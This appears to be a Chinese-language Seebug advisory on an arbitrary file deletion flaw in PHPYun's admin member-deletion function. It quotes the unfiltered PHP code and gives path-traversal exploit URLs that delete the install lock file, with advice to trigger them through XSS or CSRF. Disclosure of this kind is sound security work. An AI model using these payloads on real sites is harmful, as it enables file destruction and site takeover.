PHPYun任意文件删除漏洞(需后台触发)

2013-12-16T00:00:00
ID SSV:93987
Type seebug
Reporter Root
Modified 2013-12-16T00:00:00

Description

简要描述:

RT

详细说明:

/admin/model/com_member.class.php,279行开始:

function del_action() { if($_GET["delsub"]){ $del=$_GET["del"]; if($del){ if(@is_array($del)){ $uids = @implode(",",$del); foreach($del as $k=>$v){ $this->obj->delfiledir("..https://images.seebug.org/upload/tel/".$v);

$_GET["del"]没有做任何过滤,进入delfiledir()前,$v没有过滤 /model/class/action.class.php,709行开始:

function delfiledir($delfiles){ if(is_file($delfiles)){ @unlink($delfiles);

$delfiles进入unlink()前未过滤 可利用../等跨目录删除任意文件,如:删除install.lock后可进行重装

http://localhost/phpyun/admin/index.php?M=com_member&C=del&delsub=1&del[]=../../data/phpyun.lock

需要结合XSS/CSRF,让管理员点击触发。

漏洞证明:

http://localhost/phpyun/admin/index.php?M=com_member&C=del&delsub=1&del[]=../../data/phpyun.lock

结合XSS,CSRF等让管理员触发,删除install.lock,导致重装 exp:

http://localhost/phpyun/admin/index.php?M=com_member&C=del&delsub=1&del[]=../../[任意文件路径]